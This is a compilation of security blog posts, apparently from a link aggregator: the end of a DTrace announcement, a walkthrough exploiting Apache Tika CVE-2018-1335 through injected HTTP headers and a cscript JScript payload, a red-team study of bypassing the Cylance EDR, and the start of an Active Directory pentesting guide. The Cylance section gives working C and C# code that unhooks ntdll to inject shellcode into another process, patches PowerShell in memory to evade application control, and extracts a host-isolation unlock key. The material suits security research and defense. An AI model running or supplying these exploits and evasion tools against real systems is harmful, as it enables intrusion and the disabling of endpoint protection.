We are very excited to release the first version of DTrace on Windows.
We look forward to feedback from the Windows Insider community.

Cheers,
DTrace Team (Andrey Shedel, Gopikrishna Kannan, & Hari Pulapaka)

Source: https://techcommunity.microsoft.com/t5/Windows-Kernel-Internals/DTrace-on-Windows/ba-p/362902
  8. Exploiting CVE-2018-1335: Command Injection in Apache Tika

March 12, 2019
David Yesland

Intro

This post is a walk-through of the steps taken to go from an undisclosed CVE for a command injection vulnerability in the Apache tika-server to a complete exploit. The CVE is https://nvd.nist.gov/vuln/detail/CVE-2018-1335. Since Apache Tika is open source, I was able to take some basic information from the CVE and identify the actual issue by analyzing the Apache Tika code. Although a command injection vulnerability is typically straightforward, as you will see in this post there were some hurdles to overcome to achieve full remote code or command execution. This was due to the way Java handles executing operating system commands and also some intricacies of the Apache Tika code itself. In the end, it was still possible to get around these blockers using the Windows Script Host (Cscript.exe).

What is Apache Tika

"The Apache Tika™ toolkit detects and extracts metadata and text from over a thousand different file types (such as PPT, XLS, and PDF). All of these file types can be parsed through a single interface, making Tika useful for search engine indexing, content analysis, translation, and much more." (https://tika.apache.org/)

Apache Tika has a few different components: a Java library, a command line tool, and a standalone server (tika-server) with its own REST API. This exploit specifically targets the standalone server through the REST API it exposes (https://wiki.apache.org/tika/TikaJAXRS). The vulnerable version can be found at https://archive.apache.org/dist/tika/tika-server-1.17.jar.

Breaking Down The CVE

To start looking for the issue, we first need to read the CVE advisory and see what information can be taken from it to give us a starting point of where to look.
The description from the original advisory:

"Before Tika 1.18, clients could send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server. This vulnerability only affects those running tika-server on a server that is open to untrusted clients."

Things we can tell from this description:

- Version 1.18 is patched
- Version 1.17 is unpatched
- The vulnerability is command injection
- The entry point for the vulnerability is "headers"
- This affects the tika-server portions of the code

With this information, we now have a starting point to try and identify the vulnerability. The next step would be to perform a diff of the patched and unpatched versions of Tika, specifically the tika-server portions. Grepping the code for Java functions known to execute operating system commands would be another good place to look, as would searching for the sections of the tika-server code that interpret headers from what we can assume will be some kind of HTTP request.

Getting Into It

Doing a side-by-side recursive diff of the tika-server 1.17 vs 1.18 source directories comes back with only one file that has been modified. This is shown below, cropped to just the important parts.

Diffing tika-1.17/tika-server/src/main/java/org/apache/tika/server/ vs tika-1.18/tika-server/src/main/java/org/apache/tika/server/

Since the goal is to find command injection in a header field, having the first result be a code block added in the patched version called "ALLOWABLE_HEADER_CHARS" is a pretty good start. The assumption is that this is a patch filtering characters that could be used to inject commands via a header field. Continuing down is a large block of code inside a function called "processHeaderConfig" which looks interesting and has been removed or changed in 1.18.
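Stepping back a moment, the side-by-side recursive diff used above can be scripted rather than eyeballed. Below is a minimal sketch using Python's filecmp module (not the author's actual tooling, and the directory names are placeholders for the two extracted source trees; filecmp's default shallow comparison is sufficient here since changed source files differ in size or mtime):

```python
import filecmp
import os

def changed_files(old_dir: str, new_dir: str, rel: str = "") -> list:
    """Recursively list files whose contents differ between two source trees."""
    cmp = filecmp.dircmp(old_dir, new_dir)
    changed = [os.path.join(rel, name) for name in cmp.diff_files]
    for sub in cmp.common_dirs:
        changed += changed_files(
            os.path.join(old_dir, sub),
            os.path.join(new_dir, sub),
            os.path.join(rel, sub),
        )
    return changed

# e.g. changed_files("tika-1.17/tika-server", "tika-1.18/tika-server")
```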
It uses a variable to dynamically create a method name which appears to set properties of some object, and it uses the HTTP headers to do this.

apache/tika/tika-server/src/main/java/org/apache/tika/server/resource/TikaResource.java

Here is the description of this function:

apache/tika/tika-server/src/main/java/org/apache/tika/server/resource/TikaResource.java

The prefixes for the different properties were shown in the previous screenshot and are defined as static strings at the beginning of this code.

apache/tika/tika-server/src/main/java/org/apache/tika/server/resource/TikaResource.java

So, we have a couple of static strings that can be included as HTTP headers with a request and used to set some property of an object. An example of the final header would look something like "X-Tika-OCRsomeproperty: somevalue"; "someproperty" then gets converted to a function name that looks like "setSomeproperty()", which is invoked with "somevalue" as the value to set.

apache/tika/tika-server/src/main/java/org/apache/tika/server/resource/TikaResource.java

Here you can see this function being used, and where the prefix header is checked in the request to determine how to call the function. All the needed arguments are then passed in from the HTTP request to the "processHeaderConfig" function. Looking at the way the "processHeaderConfig" function is used, you can see the properties are being set on the "TesseractOCRConfig" object. Searching for places that use the "TesseractOCRConfig" object turns up tika-parsers/src/main/java/org/apache/tika/parser/ocr/TesseractOCRParser.java, which turned out to be pretty interesting. Here is the "doOCR" function from "TesseractOCRParser.java", which passes the config properties from the "TesseractOCRConfig" object we just discovered directly into an array of strings used to construct a command for "ProcessBuilder"; the process is then started.
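The header-to-setter conversion described above is easy to picture. Here is a rough Python rendering of the reflection logic (illustrative only, not Tika's actual Java code):

```python
PREFIX = "X-Tika-OCR"  # one of the static prefixes described above

def header_to_setter(header_name: str) -> str:
    """Map an X-Tika-OCR<property> header to the setter name invoked on the config object."""
    prop = header_name[len(PREFIX):]
    # capitalise the first character and prepend "set", JavaBean style
    return "set" + prop[:1].upper() + prop[1:]

# header_to_setter("X-Tika-OCRsomeproperty") → "setSomeproperty"
```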
apache/tika/tika-server/src/main/java/org/apache/tika/parser/ocr/TesseractOCRParser.java

This looks promising—if we put together all the information found so far, we should technically be able to make an HTTP request to the server, set a header that looks like "X-Tika-OCRTesseractPath: <some command>", and have this command inserted into the cmd string and executed. The only problem is that "config.getTesseractPath()" is prepended to another string we cannot control, "getTesseractProg()", which ends up being the static string "tesseract.exe". To get around this we can wrap the command we want to execute in double quotes; Windows will ignore whatever is appended after the quotes and just execute our injected command.

To put this to the test we can use an example from the tika-server documentation for retrieving metadata about a file (https://wiki.apache.org/tika/TikaJAXRS). Since OCR stands for Optical Character Recognition, used for pulling text and content out of images, we will upload an image instead of a docx to hopefully reach the "doOCR" function. We end up with:

curl -T test.tiff http://localhost:9998/meta --header "X-Tika-OCRTesseractPath: \"calc.exe\""

There you have it—the command injection was identified by wrapping a command in double quotes as the value for the "X-Tika-OCRTesseractPath" HTTP header in a PUT request while uploading an image.

Can you do more than pop calc?

At this point, you can see that we are just directly changing the application name that is executed. Because the command is being passed to Java's ProcessBuilder as an array, we cannot actually run more than one command or add arguments to the command as a single string, or the execution will fail. This is because passing an array of strings to ProcessBuilder or Runtime.exec in Java works like this: characters that are normally interpreted by shells like cmd.exe or /bin/sh, such as &, <, >, |, ` etc.,
are not interpreted by ProcessBuilder and will be ignored, so you cannot break out of the command or add any arguments to it as a single string. It is not as simple as doing something like "X-Tika-OCRTesseractPath: \"cmd.exe /c some args\"", or any combination of this.

Coming back to the construction of the "cmd" array, you can see we control multiple arguments in the command as well—each item that looks like "config.get*()"—but these are broken up by other items we do not control. My first thought was to run "cmd.exe", pass in the argument "/C" as "config.getLanguage()", and then insert "||somecommand||" as "config.getPageSegMode()", which would have resulted in "somecommand" being executed. However, this did not work, because prior to "doOCR" being called there is another function invoked on the "config.getTesseractPath()" string (the modified command) which simply executes just that command (its purpose is to check that the application being called is valid). The problem is that this would run "cmd.exe" with no arguments and cause the server to hang, since "cmd.exe" would never exit and let execution continue to the "doOCR" function.

Coming Up With a Solution

To go beyond running a single command, we can take a deeper look at what happens when the "doOCR" function starts the process, using Process Monitor. Viewing the properties of the process when the tika-server starts it reveals the following command line, constructed with the injected command:

"calc.exe"tesseract.exe C:\Users\Test\AppData\Local\Temp\apache-tika-3299124493942985299.tmp C:\Users\Test\AppData\Local\Temp\apache-tika-7317860646082338953.tmp -l eng -psm 1 txt -c preserve_interword_spaces=0

The portions of the command we control are highlighted in red. There are three places we can inject into the command: one command and two arguments.
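The exec-style argument-array behaviour described above is easy to demonstrate. Python's subprocess takes an argv list the same way Java's ProcessBuilder does, so the same property holds (the payload string below is purely illustrative):

```python
import subprocess
import sys

# The argv list goes straight to the child process: no shell ever parses it,
# so shell metacharacters arrive as one literal argument.
result = subprocess.run(
    [sys.executable, "-c", "import sys; print(sys.argv[1])",
     "payload && whoami | more"],
    capture_output=True, text=True,
)
print(result.stdout.strip())  # prints: payload && whoami | more
```

This is exactly why stuffing "cmd.exe /c some args" into a single array element fails: the whole string is treated as one program name, not a shell command line.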
Another interesting finding here is that Tika actually creates two temp files, one of which is passed as the first argument. After some further investigation I was able to confirm that the first temp file passed to the command contains the contents of the file I was uploading. This meant I could perhaps fill that file with some code or command and execute it. Now I had to find a native Windows application that would ignore all the stray arguments added by tika-server and still execute the first file's contents as some kind of command or code, even though it has a ".tmp" extension. Finding something that would do all this sounded very unlikely to me at first. After clicking around https://github.com/api0cradle/LOLBAS for a while looking at LOLBins, thinking maybe I could get lucky, I came across Cscript.exe, and it looked somewhat promising. Let's take a look at what Cscript can do.

Cscript turned out to be just what was needed. It takes the first argument as a script and allows you to use the "//E:engine" flag to specify which script engine you want to use (this could be JScript or VBS), so the file extension does not matter. Putting this into the new command now looks like the following:

"cscript.exe"tesseract.exe C:\Users\Test\AppData\Local\Temp\apache-tika-3299124493942985299.tmp C:\Users\Test\AppData\Local\Temp\apache-tika-7317860646082338953.tmp -l //E:Jscript -psm 1 txt -c preserve_interword_spaces=0

This is done by setting the following HTTP headers:

X-Tika-OCRTesseractPath: "cscript.exe"
X-Tika-OCRLanguage: //E:Jscript

The "image" file that will be uploaded will contain some JScript or VBS:

var oShell = WScript.CreateObject("WScript.Shell");
var oExec = oShell.Exec('cmd /c calc.exe');

At first, uploading an image with those contents failed, since it was not a valid image and the magic bytes of the image could not be verified.
I then found that setting the Content-Type to "image/jp2" forces Tika to skip checking the image's magic bytes while still processing the image through OCR. This allowed an image containing JScript to be uploaded. Putting all this together, we have full command/JScript/VBS execution.

Conclusion

What seemed to be a simple command injection bug turned out to have quite a few blockers to overcome in order to actually exploit it, and it was interesting coming up with a method to get around each hurdle. Although this was difficult to exploit, it was still possible, which reiterates the point that you should never use untrusted input when constructing operating system commands. Apache does not suggest running the tika-server in an untrusted environment or exposing it to untrusted users. This bug has also been patched; the current version is 1.20, so make sure you update if you are using this service.

You can find the PoC in the Rhino Security Labs CVE repo: https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2018-1335

Source: https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/
  9. Silencing Cylance: A Case Study in Modern EDRs

12/03/2019 | Author: Admin

As red teamers regularly operating against mature organisations, we frequently come into contact with a variety of Endpoint Detection & Response solutions. To better our chances of success in these environments, we regularly analyse these solutions to identify gaps, bypasses and other opportunities to operate effectively. One of the solutions we regularly come across is CylancePROTECT, the EDR from Cylance Inc., who were recently acquired by Blackberry in a reported $1.4 billion deal.

In this blog post we will explore some of our findings that might assist red teamers operating in environments where CylancePROTECT is in place, and briefly touch on CylanceOPTICS, a complementary solution that provides rule-based detection on the endpoint. We also aim to provide defenders with insight into how this solution operates, so they have a better understanding of gaps that may exist and where complementary solutions can be introduced to mitigate risk.

Cylance Overview

CylancePROTECT (hereinafter also referred to as Cylance) functions on a device policy basis which is configurable through the Cylance SaaS portal; policies include the following security-relevant configuration options:

- Memory Actions: control which memory protections are enabled, including techniques for exploitation, process injection and escalation,
- Application Control: blocks new applications being run,
- Script Control: configuration to block Active Script (VBS and JS), PowerShell and Office macros,
- Device Control: configure access to removable media.

During this case study, we will analyse the effectiveness of some of these controls and illustrate techniques that we found to bypass or disable them. All results are taken from CylancePROTECT agent version 2.0.1500, the latest version at the time of writing (Dec 2018).
Script Control

As noted, the script control feature of CylancePROTECT allows administrators to configure whether Windows Scripting, PowerShell and Office macros are blocked, permitted, or allowed with alerting on the endpoint. A sample configuration may look as follows, configured to block all Script, PowerShell and macro files:

In such a configuration, simple VBA macro-enabled documents are disabled as per the policy; even relatively benign macros such as the following will be blocked:

This will cause an event to be generated inside the Cylance dashboard similar to the following:

While this is relatively effective at neutering VBA macros, we noted that Excel 4.0 macros are not accounted for and have relatively carte blanche access, as shown below:

CylancePROTECT has no restrictions on Excel 4.0 macro-enabled documents, even when macro documents are explicitly blocked by policy. These therefore provide an effective means of obtaining initial access in a Cylance environment. Further details on weaponising Excel 4.0 macro-enabled documents can be found in this excellent research by Stan Hegt. It should be noted that other controls, such as the memory protections (exploitation, injection and escalation), are still in effect; we'll discuss those later on.

Aside from macros, CylancePROTECT can also prevent the execution of Windows Script Host files, specifically VBScript and JavaScript files.
As expected, attempting to run simple scripts with WScript.Shell inside a .js or .vbs file, such as the following, will be blocked by Cylance due to the ActiveScript protection:

This will generate an error inside the Cylance dashboard such as:

However, if we take the exact same JavaScript code and embed it inside a HTML Application such as the following:

We can see that CylancePROTECT does not apply the same controls to any scripts that aren't directly executed with wscript.exe, as shown below where the HTA spawned through mshta.exe runs without issue:

Popping calc is all well and good, but let's look at what happens if we try something more useful and weaponise a HTA using our SharpShooter tool. SharpShooter will generate a DotNetToJScript payload that executes raw shellcode in memory by first allocating memory for it with VirtualAlloc, then getting a function pointer to it and executing it; this is a fairly standard method of executing shellcode in .NET. On executing the HTA, an error is generated and the payload is blocked by Cylance. Diving into the dashboard, there is little information on the cause, but it is almost certainly a result of the memory protection controls, which we will dive into shortly:

Disregarding shellcode execution for the moment (we'll address that shortly), we already saw Cylance was quite nonchalant when we were executing calc.exe using either the macro or HTA payloads. Let's see how it reacts if we try to download and run a Cobalt Strike beacon; the following HTA will simply use WScript to call certutil to download and execute a vanilla Cobalt Strike executable:

As you can see, if you're operating in an environment with CylancePROTECT, you'll probably want to bring your favourite application whitelisting bypasses to the party!

Memory Protections

Let's now take a look at the memory protections.
When analysing an endpoint security product's memory protection, it is often useful to review just how that product detects the usage of often-suspicious APIs such as CreateRemoteThread or WriteProcessMemory. In the case of Cylance, we know that memory analysis is exposed via several console options:

If these protections are enabled, what we find is that a DLL, CyMemdef.dll, is injected into 32-bit processes, and CyMemDef64.dll into 64-bit processes. To understand the protection being employed, we can simulate a common malware memory injection technique leveraging CreateRemoteThread. A small POC was created with the following code (buf holds the shellcode):

HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, false, procID);
if (hProc == NULL) {   // OpenProcess returns NULL, not INVALID_HANDLE_VALUE, on failure
    printf("Error opening process ID %d\n", procID);
    return 1;
}

void *alloc = VirtualAllocEx(hProc, NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (alloc == NULL) {
    printf("Error allocating memory in remote process\n");
    return 1;
}

if (WriteProcessMemory(hProc, alloc, buf, sizeof(buf), NULL) == 0) {
    printf("Error writing to remote process memory\n");
    return 1;
}

HANDLE tRemote = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)alloc, NULL, 0, NULL);
if (tRemote == NULL) {   // CreateRemoteThread also returns NULL on failure
    printf("Error starting remote thread\n");
    return 1;
}

As expected, executing this code will result in Cylance detecting and terminating the process:

Reviewing the Cylance-injected DLL, we see that a number of hooks are placed within the process to detect the use of these kinds of suspicious functions. For example, placing a breakpoint at NtCreateThreadEx (which provides the syscall bridge for CreateRemoteThread) and invoking the API call, we see that the function has been modified with a JMP:

Continuing execution via this JMP triggers an alert within Cylance and forces the termination of our application.
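Spotting such a hook comes down to comparing a function's first bytes against the clean x64 syscall stub (mov r10, rcx; mov eax, <syscall number>, i.e. 4C 8B D1 B8) — the same byte sequence an unhooking routine would write back. A small illustrative sketch, where the byte values mirror the POC in this post rather than a live memory dump:

```python
# Clean x64 Nt* syscall stub prologue: mov r10, rcx; mov eax, <imm32>
CLEAN_STUB = bytes([0x4C, 0x8B, 0xD1, 0xB8])

def looks_hooked(prologue: bytes) -> bool:
    """Flag a function whose first bytes no longer match the expected clean stub."""
    return not prologue.startswith(CLEAN_STUB)

hooked = bytes([0xE9, 0x11, 0x22, 0x33, 0x44])        # JMP rel32 planted by the hook
clean = CLEAN_STUB + bytes([0xBB, 0x00, 0x00, 0x00])  # e.g. eax = 0xBB for ZwCreateThreadEx

assert looks_hooked(hooked)
assert not looks_hooked(clean)
```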
Knowing this, we can simply modify the hooked instructions from our process to remove Cylance's detection:

#include <iostream>
#include <windows.h>

unsigned char buf[] = "SHELLCODE_GOES_HERE";

struct syscall_table {
    int osVersion;
};

// Remove Cylance hook from DLL export
void removeCylanceHook(const char *dll, const char *apiName, char code) {
    DWORD old, newOld;
    void *procAddress = GetProcAddress(LoadLibraryA(dll), apiName);
    printf("[*] Updating memory protection of %s!%s\n", dll, apiName);
    VirtualProtect(procAddress, 10, PAGE_EXECUTE_READWRITE, &old);
    printf("[*] Unhooking Cylance\n");
    memcpy(procAddress, "\x4c\x8b\xd1\xb8", 4);
    *((char *)procAddress + 4) = code;
    VirtualProtect(procAddress, 10, old, &newOld);
}

int main(int argc, char **argv) {
    if (argc != 2) {
        printf("Usage: %s PID\n", argv[0]);
        return 2;
    }
    DWORD processID = atoi(argv[1]);
    HANDLE proc = OpenProcess(PROCESS_ALL_ACCESS, false, processID);
    if (proc == INVALID_HANDLE_VALUE) {
        printf("[!] Error: Could not open target process: %d\n", processID);
        return 1;
    }
    printf("[*] Opened target process %d\n", processID);
    printf("[*] Allocating memory in target process with VirtualAllocEx\n");
    void *alloc = VirtualAllocEx(proc, NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (alloc == (void*)0) {
        printf("[!] Error: Could not allocate memory in target process\n");
        return 1;
    }
    printf("[*] Allocated %d bytes at memory address %p\n", sizeof(buf), alloc);
    printf("[*] Attempting to write into victim process using WriteProcessMemory\n");
    if (WriteProcessMemory(proc, alloc, buf, sizeof(buf), NULL) == 0) {
        printf("[!] Error: Could not write to target process memory\n");
        return 1;
    }
    printf("[*] WriteProcessMemory successful\n");

    // Remove the NTDLL.DLL hook added by userland DLL
    removeCylanceHook("ntdll.dll", "ZwCreateThreadEx", 0xBB);

    printf("[*] Attempting to spawn shellcode using CreateRemoteThread\n");
    HANDLE createRemote = CreateRemoteThread(proc, NULL, 0, (LPTHREAD_START_ROUTINE)alloc, NULL, 0, NULL);
    printf("[*] Success :D\n");
}

And after executing our POC, we can see that our shellcode is spawned without any alert:

This form of self-policing will always be problematic, as it depends on the process to detect its own bad behaviour. While we originally began work on this post back in November 2018, we must reference @fsx30, who has since publicly documented this issue and shown how it could be used in the context of dumping process memory.

Application Control

Another protection feature offered by Cylance is the option to disable a user's ability to execute applications such as PowerShell. With this protection enabled, attempting to execute PowerShell will result in the following alert:

We already know from the above analysis that DLLs are injected into a process as a way of allowing Cylance to analyse and deploy preventative measures. Knowing this, the DLL CyMemDef64.dll was analysed to identify whether it also provides the above restriction. The first area of interesting functionality we see is a call to NtQueryInformationProcess, which aims to determine the application's executable name:

Once recovered, this is compared to the string "PowerShell.exe":

If we take the PowerShell.exe executable and rename it to PS.exe, we might expect to see this check bypassed… well, not quite (believe us, this used to be the workaround for Cylance's PowerShell protection before additional mitigations were added, long live Powercatz.exe).
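A name-only comparison like that first check is simple to model, and the toy sketch below (not Cylance's code) makes the weakness obvious — a renamed binary sails past it:

```python
def name_check_only(image_name: str) -> bool:
    """Toy mimic of a block based solely on the executable's name."""
    return image_name.lower() == "powershell.exe"

assert name_check_only("PowerShell.exe")
assert not name_check_only("ps.exe")  # a renamed copy slips through a name-only check
```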
This indicates that there must be a further check being performed, which we find within the same function:

Here we see a reference to the string "powershell.pdb", which is passed to a function that determines whether this reference appears within the PE debug directory. If it does, another DLL, CyMemDefPS64.dll, is loaded into the PowerShell process; this is a .NET assembly responsible for the message displayed above. So what if we were to modify the PowerShell executable's PDB entry using something like a hex editor?

Cool, so now we know just how Cylance is blocking PowerShell execution, but modifying a binary in this way isn't ideal, given that the file hash will change and any signatures will likely be invalidated. How can we achieve the same effect without modifying the hash of the PowerShell executable? One way would be to spawn the PowerShell process and attempt to modify the PDB reference in memory. To spawn PowerShell, we will use CreateProcess with the CREATE_SUSPENDED flag. Once the suspended thread has been created, we need to find the base address of the PowerShell PE in memory by locating the PEB structure. Then it is simply a case of traversing the PE file structure to modify the PDB reference before resuming execution.
The code to do this looks like this:

#include <iostream>
#include <Windows.h>
#include <winternl.h>

typedef NTSTATUS (*NtQueryInformationProcess2)(
    IN HANDLE, IN PROCESSINFOCLASS, OUT PVOID, IN ULONG, OUT PULONG
);

struct PdbInfo {
    DWORD Signature;
    BYTE Guid[16];
    DWORD Age;
    char PdbFileName[1];
};

void* readProcessMemory(HANDLE process, void *address, DWORD bytes) {
    char *alloc = (char *)malloc(bytes);
    SIZE_T bytesRead;
    ReadProcessMemory(process, address, alloc, bytes, &bytesRead);
    return alloc;
}

void writeProcessMemory(HANDLE process, void *address, void *data, DWORD bytes) {
    SIZE_T bytesWritten;
    WriteProcessMemory(process, address, data, bytes, &bytesWritten);
}

void updatePdb(HANDLE process, char *base_pointer) {
    // This is where the MZ...blah header lives (the DOS header)
    IMAGE_DOS_HEADER* dos_header = (IMAGE_DOS_HEADER*)readProcessMemory(process, base_pointer, sizeof(IMAGE_DOS_HEADER));

    // We want the PE header.
    IMAGE_FILE_HEADER* file_header = (IMAGE_FILE_HEADER*)readProcessMemory(process, (base_pointer + dos_header->e_lfanew + 4), sizeof(IMAGE_FILE_HEADER) + sizeof(IMAGE_OPTIONAL_HEADER));

    // Straight after that is the optional header (which technically is optional, but in practice always there.)
    IMAGE_OPTIONAL_HEADER *opt_header = (IMAGE_OPTIONAL_HEADER *)((char *)file_header + sizeof(IMAGE_FILE_HEADER));

    // Grab the debug data directory which has an indirection to its data
    IMAGE_DATA_DIRECTORY* dir = &opt_header->DataDirectory[IMAGE_DIRECTORY_ENTRY_DEBUG];

    // Convert that data to the right type.
    IMAGE_DEBUG_DIRECTORY* dbg_dir = (IMAGE_DEBUG_DIRECTORY*)readProcessMemory(process, (base_pointer + dir->VirtualAddress), dir->Size);

    // Check to see that the data has the right type
    if (IMAGE_DEBUG_TYPE_CODEVIEW == dbg_dir->Type) {
        PdbInfo* pdb_info = (PdbInfo*)readProcessMemory(process, (base_pointer + dbg_dir->AddressOfRawData), sizeof(PdbInfo) + 20);
        if (0 == memcmp(&pdb_info->Signature, "RSDS", 4)) {
            printf("[*] PDB Path Found To Be: %s\n", pdb_info->PdbFileName);
            // Update this value to bypass the check
            DWORD oldProt;
            VirtualProtectEx(process, base_pointer + dbg_dir->AddressOfRawData, 1000, PAGE_EXECUTE_READWRITE, &oldProt);
            writeProcessMemory(process, base_pointer + dbg_dir->AddressOfRawData + sizeof(PdbInfo), (void*)"xpn", 3);
        }
    }

    // Verify that the PDB path has now been updated
    PdbInfo* pdb2_info = (PdbInfo*)readProcessMemory(process, (base_pointer + dbg_dir->AddressOfRawData), sizeof(PdbInfo) + 20);
    printf("[*] PDB path is now: %s\n", pdb2_info->PdbFileName);
}

int main() {
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;
    CONTEXT context;
    NtQueryInformationProcess2 ntpi;
    PROCESS_BASIC_INFORMATION pbi;
    DWORD retLen;
    SIZE_T bytesRead;
    PEB pebLocal;

    memset(&si, 0, sizeof(si));
    memset(&pi, 0, sizeof(pi));

    printf("Bypass Powershell restriction POC\n\n");

    // Copy the exe to another location
    printf("[*] Copying Powershell.exe over to Tasks to avoid first check\n");
    CopyFileA("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "C:\\Windows\\Tasks\\ps.exe", false);

    // Start process but suspended
    printf("[*] Spawning Powershell process in suspended state\n");
    CreateProcessA(NULL, (LPSTR)"C:\\Windows\\Tasks\\ps.exe", NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, "C:\\Windows\\System32\\", &si, &pi);

    // Get thread address
    context.ContextFlags = CONTEXT_FULL | CONTEXT_DEBUG_REGISTERS;
    GetThreadContext(pi.hThread, &context);

    // Resolve GS to linear address
    printf("[*] Querying process for PEB address\n");
    ntpi = (NtQueryInformationProcess2)GetProcAddress(LoadLibraryA("ntdll.dll"), "NtQueryInformationProcess");
    ntpi(pi.hProcess, ProcessBasicInformation, &pbi, sizeof(pbi), &retLen);
    ReadProcessMemory(pi.hProcess, pbi.PebBaseAddress, &pebLocal, sizeof(PEB), &bytesRead);
    printf("[*] Base address of Powershell.exe found to be %p\n", pebLocal.Reserved3[1]);

    // Update the PDB path in memory to avoid triggering Cylance check
    printf("[*] Updating PEB in memory\n");
    updatePdb(pi.hProcess, (char*)pebLocal.Reserved3[1]);

    // Finally, resume execution and spawn Powershell
    printf("[*] Finally, resuming thread... here comes Powershell :D\n");
    ResumeThread(pi.hThread);
}

And when executed:

Office Macro Bypass

As discussed earlier, Office-based VBA macro protection has been well implemented within Cylance (aside from the noted absence of Excel 4.0 support). Reviewing the protection in detail, what we find is that a number of checks are added to the VBA runtime by implementing hooks similar to those seen above. In this case, however, the hooks are added to VBE7.dll, which is responsible for exposing functionality such as Shell or CreateObject:

What was found, however, was that should the CreateObject call succeed, no further checks are completed on the exposed COM object. This means that should we find another way to initialise a target COM object, we can walk right past Cylance's protection. One way to do this is to simply add a reference to the VBA project; for example, we can add a reference to "Windows Script Host Object Model":

This will then expose the "WshShell" object to our VBA and gets us past the hooked CreateObject call. Once this is completed, we find that we can resume the normal Office macro tricks:

Bonus Round: CylanceOPTICS Isolation Bypass

Although we didn't focus too much on CylanceOPTICS, it would be a shame not to take a cursory look at one of the interesting features that it offers.
A component of many EDR solutions is the ability to isolate a host from the network if an analyst detects suspicious activity. Should an attacker be using the host as an entry point into a network, this serves as an effective way to eliminate them from it. CylanceOPTICS provides such a solution, exposing a Lockdown option via the web interface:

Upon isolating a host, we find that an unlock key is provided:

As the ability to reconnect a previously isolated host would prove extremely valuable to us during an engagement, we wanted to understand just how difficult this would be for an attacker who had compromised a host and did not possess such an unlock key. The CylanceOPTICS assemblies were reviewed, revealing an interesting obfuscated call to retrieve a registry value:

We find that this call retrieves the value from HKEY_LOCAL_MACHINE\SOFTWARE\Cylance\Optics\PdbP. The value is then passed to the .NET DPAPI ProtectedData.Unprotect API:

Attempting to decrypt the registry value with the DPAPI master key for LOCAL SYSTEM results in a password being extracted.
The code to show this can be found below:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;

namespace CyOpticseUnlock
{
    class Program
    {
        static void Main(string[] args)
        {
            // Static entropy bytes passed to DPAPI's Unprotect
            // (named entropy here because "fixed" is a reserved keyword in C#)
            var entropy = new byte[] {
                0x78, 0x6A, 0x34, 0x37, 0x38, 0x53, 0x52, 0x4C, 0x43, 0x33, 0x2A, 0x46,
                0x70, 0x66, 0x6B, 0x44, 0x24, 0x3D, 0x50, 0x76, 0x54, 0x65, 0x45, 0x38,
                0x40, 0x78, 0x48, 0x55, 0x54, 0x75, 0x42, 0x3F, 0x7A, 0x38, 0x2B, 0x75,
                0x21, 0x6E, 0x46, 0x44, 0x24, 0x6A, 0x59, 0x65, 0x4C, 0x62, 0x32, 0x40,
                0x4C, 0x67, 0x54, 0x48, 0x6B, 0x51, 0x50, 0x35, 0x2D, 0x46, 0x6E, 0x4C,
                0x44, 0x36, 0x61, 0x4D, 0x55, 0x4A, 0x74, 0x33, 0x7E
            };

            Console.WriteLine("CyOptics - Grab Unlock Key\n");
            Console.WriteLine("[*] Grabbing unlock key from HKEY_LOCAL_MACHINE\\SOFTWARE\\Cylance\\Optics\\PdbP");
            byte[] PdbP = (byte[])Microsoft.Win32.Registry.GetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Cylance\\Optics", "PdbP", new byte[] { });

            Console.WriteLine("[*] Passing to DPAPI to unprotect");
            var data = System.Security.Cryptography.ProtectedData.Unprotect(PdbP, entropy, System.Security.Cryptography.DataProtectionScope.CurrentUser);

            System.Console.WriteLine("[*] Success!! Key is: {0}", ASCIIEncoding.ASCII.GetString(data));
        }
    }
}

Now we just need to pass this password over to CyOptics and we can resume network connectivity:

After exploring this a bit further, what we actually found was that although we were able to retrieve the key, if you execute the CyOptics command as LOCAL SYSTEM you are not required to provide a key at all, allowing network lockdown to be disabled simply by running:

CyOptics.exe control unlock -net

This blog post was written by Adam Chester and Dominic Chell.

Source: https://www.mdsec.co.uk/2019/03/silencing-cylance-a-case-study-in-modern-edrs/
  10. Penetration Testing Active Directory, Part II Hausec Infosec March 12, 2019 13 Minutes
In the previous article, I obtained credentials to the domain three different ways. For most of this part of the series, I will use the rsmith user credentials, as they are low-level, forcing us to do privilege escalation. Privilege escalation in Windows can of course come from a missing patch or an unquoted service path, but since this is pentesting AD, we're going to exploit some AD-specific things in order to elevate privileges. With credentials to the network, we should now do a little recon before going straight to missing-patch exploits. There are a few tools and techniques that will help.
Phase II: Privilege Escalation & Reconnaissance
"Time spent on reconnaissance is seldom wasted." – Arthur Wellesley
Tool: Bloodhound
One of my favorite tools is Bloodhound. Attackers think in graphs, so Bloodhound is an excellent tool because it literally maps out the domain in a graph, revealing relationships that are both intended and unintended. From an attacker's perspective, this is interesting because it shows us targets. I wrote a whole thing on Bloodhound, which can be read here, but I'll show a tl;dr version. Let's assume you don't have a session open on a machine, but you have credentials. You can still use Bloodhound's Python ingestor and remotely gather the data. It can be installed via git:

git clone https://github.com/fox-it/BloodHound.py.git
cd BloodHound.py/ && pip install .

Then it can be run by passing in the credentials, domain, and DC IP:

bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all

Once BH does its thing, it will store the data in the directory you ran it in, in .json format. Copy those files, then drag them into Bloodhound and you now have a pretty graph of the network. If you sort by "Shortest path to domain admin" you'll get something similar to below: AdminAlice is logged into a DC.
The power of this is that you can directly see which administrators are logged into which machines, giving you your next target. In a domain of hundreds or even thousands of machines that will accept low-privilege credentials, you don't want to waste time just gathering other low-priv creds. This gives you a target list, among many other things. Other uses include identifying SQL servers that might have databases containing credentials, identifying which machines can be RDP'd into, and much more. I encourage you to read more about its capabilities in depth here. I also encourage you to look at GoFetch, which automatically executes an attack plan drawn out by Bloodhound.
Attack: Kerberoasting | Tool: GetUserSPNs.py
